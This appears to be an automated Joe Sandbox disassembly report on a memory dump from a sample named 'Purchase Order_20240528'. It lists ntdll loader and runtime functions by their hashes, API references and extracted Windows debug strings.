                                  • Opcode ID: a8f6e4955231c5bb919c2256db4354d3ab3c98f3c83a13636d7f644309d2a5d2
                                  • Instruction ID: e83fe953a741d2efeab6acb9013e249581b863a8105e2283392a1255f259c584
                                  • Opcode Fuzzy Hash: a8f6e4955231c5bb919c2256db4354d3ab3c98f3c83a13636d7f644309d2a5d2
                                  • Instruction Fuzzy Hash: 3E519D725053119BD329EF188C84BABBBECBFD8350F544A1DF99987285E770D604CB92
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 015D656C
                                    • Part of subcall function 015D65B5: RtlDebugPrintTimes.NTDLL ref: 015D6664
                                    • Part of subcall function 015D65B5: RtlDebugPrintTimes.NTDLL ref: 015D66AF
                                  Strings
                                  • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01639A2A
                                  • LdrpInitShimEngine, xrefs: 016399F4, 01639A07, 01639A30
                                  • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 016399ED
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01639A11, 01639A3A
                                  • Getting the shim user exports failed with status 0x%08lx, xrefs: 01639A01
                                  • apphelp.dll, xrefs: 015D6496
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-204845295
                                  • Opcode ID: 65bfed2a5161af2472bc0efd4b3801fa128c8da53ca875ffe7b9f1595bbb7c74
                                  • Instruction ID: 95244aafa106e526f599f11b4cf6bf9fc19376d0b1f66b123f4ac5ccbe7b9614
                                  • Opcode Fuzzy Hash: 65bfed2a5161af2472bc0efd4b3801fa128c8da53ca875ffe7b9f1595bbb7c74
                                  • Instruction Fuzzy Hash: 095190716083059FE724DF68CC81BAB77E5FBC4748F40091DE9859B250DBB0E946CB96
                                  Strings
                                  • VerifierDebug, xrefs: 01668CA5
                                  • HandleTraces, xrefs: 01668C8F
                                  • AVRF: -*- final list of providers -*- , xrefs: 01668B8F
                                  • VerifierFlags, xrefs: 01668C50
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01668A3D
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01668A67
                                  • VerifierDlls, xrefs: 01668CBD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: 908345a339b8505ae951b4719fa6e17eb1dd3f4434eaa80ad38869b85c57c1b1
                                  • Instruction ID: 9a191cfd6b33865fabc173689e91e6ea376de7681248115970e6758456dd1158
                                  • Opcode Fuzzy Hash: 908345a339b8505ae951b4719fa6e17eb1dd3f4434eaa80ad38869b85c57c1b1
                                  • Instruction Fuzzy Hash: 5A911272A42712AFD721EF78CC90B5A7BADBBA4B14F04445CFA426F644C770AC05CBA5
                                  Strings
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0164A992
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0164A9A2
                                  • LdrpDynamicShimModule, xrefs: 0164A998
                                  • apphelp.dll, xrefs: 01602462
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: 76eb4f6f6ec14934da9e61e079a6b96cbe69b65ce7fe9ff87f91a2506f6a2a59
                                  • Instruction ID: 4cb74187eb240cf4043e0ed6cda8de52d9cac5990ad30b2ef8bbea45e77a466c
                                  • Opcode Fuzzy Hash: 76eb4f6f6ec14934da9e61e079a6b96cbe69b65ce7fe9ff87f91a2506f6a2a59
                                  • Instruction Fuzzy Hash: AC3146B5E91202BBDB359F9DCC85A6AB7B5FB84B00F17001DE9026B345C7B05892C790
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: 493aec505ef7f5ddff60759fe4f2959b72b5db4cb8fb81cc509ba40c057b2781
                                  • Instruction ID: e1570e4b1b38af83355ac08c4343769a63b04cbbb0fea3819e650a01940e5f0c
                                  • Opcode Fuzzy Hash: 493aec505ef7f5ddff60759fe4f2959b72b5db4cb8fb81cc509ba40c057b2781
                                  • Instruction Fuzzy Hash: 7DA21774E0562A8FDB68DF19CD997A9BBF5FB45304F1442EAD909AB250DB309E81CF00
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: a5e45dff091d42f2fe938a5c01c6ef200fc754fb9ab1d7748ee4ce50856f5548
                                  • Instruction ID: f6759c52eadf8bf71668481b3d0e03ae160183f7ae6b11b42aeec441e631e1ef
                                  • Opcode Fuzzy Hash: a5e45dff091d42f2fe938a5c01c6ef200fc754fb9ab1d7748ee4ce50856f5548
                                  • Instruction Fuzzy Hash: 40916871F423229BDB35DF58DC44BAA7BB2BB40B14F04805CED016B785EBB09842C795
                                  Strings
                                  • SXS: %s() passed the empty activation context, xrefs: 01652165
                                  • RtlGetAssemblyStorageRoot, xrefs: 01652160, 0165219A, 016521BA
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01652178
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01652180
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0165219F
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016521BF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: 20b9020f5b2118b4a209046d268d4a3988a951930a84623958d8e76456222be4
                                  • Instruction ID: f13187491160a52cad81ed6a0e8af6d00ec1a6c432fa03fcce4a3af2d3ea0746
                                  • Opcode Fuzzy Hash: 20b9020f5b2118b4a209046d268d4a3988a951930a84623958d8e76456222be4
                                  • Instruction Fuzzy Hash: 78310636A40215ABE7218EDADCA1F6B7A69EB54E50F19405DBB046B244D7709A01CBA0
                                  Strings
                                  • Loading import redirection DLL: '%wZ', xrefs: 01658170
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01658181, 016581F5
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 016581E5
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0161C6C3
                                  • LdrpInitializeImportRedirection, xrefs: 01658177, 016581EB
                                  • LdrpInitializeProcess, xrefs: 0161C6C4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: 8fa702729dbc40b361d532254f067679010342f0914f1cef5adbb71fabd6364d
                                  • Instruction ID: 0f1cd5012fefb30ae273b6568c9275a35de051e3755afce5dbb2649db9fe4dab
                                  • Opcode Fuzzy Hash: 8fa702729dbc40b361d532254f067679010342f0914f1cef5adbb71fabd6364d
                                  • Instruction Fuzzy Hash: 153104716447169FC324EF69DC45E2A77A5BF94B10F05095CFD806B391E720EC04C7A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                  • Instruction ID: d5b76cb1ea800d229ccae8aa852007dec9f4ed07f787f5101e91a02753b14b68
                                  • Opcode Fuzzy Hash: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                  • Instruction Fuzzy Hash: 9DF1BF30A01606DFEB25CF68C994B6AB7F6FF44704F1885ADE6169B392D730E941CB90
                                  APIs
                                  Strings
                                  • Failed to allocated memory for shimmed module list, xrefs: 0164A10F
                                  • LdrpCheckModule, xrefs: 0164A117
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0164A121
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-161242083
                                  • Opcode ID: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                  • Instruction ID: e91d5cf8b0d0cc8cb65a6378a0bb8f6fb1ca77a256a9e32b5918faddf3ac6089
                                  • Opcode Fuzzy Hash: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                  • Instruction Fuzzy Hash: 9471C171E402069FDB2ADFA8CD81BAEB7F5FB48644F15402DE506DB351E734A942CB50
                                  APIs
                                  Strings
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 016582DE
                                  • Failed to reallocate the system dirs string !, xrefs: 016582D7
                                  • minkernel\ntdll\ldrinit.c, xrefs: 016582E8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1783798831
                                  • Opcode ID: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
                                  • Instruction ID: 5d8f0b9bdaf34fcf2ff248550fad74f7eb2e70366c86f329f48f1d3ae0c39afc
                                  • Opcode Fuzzy Hash: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
                                  • Instruction Fuzzy Hash: C841F1B1951312ABD721EB69DC44B6B7BE8FF84750F04482EF944D7294E7B0D800CB92
                                  APIs
                                  Strings
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01664888
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01664899
                                  • LdrpCheckRedirection, xrefs: 0166488F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 3446177414-3154609507
                                  • Opcode ID: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                  • Instruction ID: 3f32c0e1e4fbdbfc9568f0a73c85dba48647fb69d96aeff8c652237d210d989a
                                  • Opcode Fuzzy Hash: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                  • Instruction Fuzzy Hash: CE41D132A056519FCB21CE6CDD40A66BFEDBF8AA90F06056DED49DB351DB30E810CB91
                                  APIs
                                    • Part of subcall function 01622DF0: LdrInitializeThunk.NTDLL ref: 01622DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D74
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: 0024e2b11792d85b938444472787c45bfac417f1b839533ed49c7dc6b2a9384c
                                  • Instruction ID: 12d020c000f2aeb2d810c074dcc9be137e94660894c7980ff08151b4274819b7
                                  • Opcode Fuzzy Hash: 0024e2b11792d85b938444472787c45bfac417f1b839533ed49c7dc6b2a9384c
                                  • Instruction Fuzzy Hash: 2F425A75900715DFDB61CF28CC80BAAB7F5BF44314F1485AAE989EB241E770AA85CF60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  APIs
                                  Strings
                                  • kLsE, xrefs: 015E0540
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015E063D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 3446177414-2547482624
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  Strings
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0161855E
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01618421
                                  • @, xrefs: 01618591
                                  • LdrpInitializeProcess, xrefs: 01618422
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  Strings
                                  • SXS: %s() passed the empty activation context, xrefs: 016521DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016522B6
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016521D9, 016522B1
                                  • .Local, xrefs: 016128D8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  Strings
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0165342A
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01653437
                                  • RtlDeactivateActivationContext, xrefs: 01653425, 01653432, 01653451
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01653456
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0164106B
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016410AE
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01640FE5
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01641028
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 015F3255
                                  • HEAP: , xrefs: 015F3264
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015F327D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $@
                                  • API String ID: 0-1077428164
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
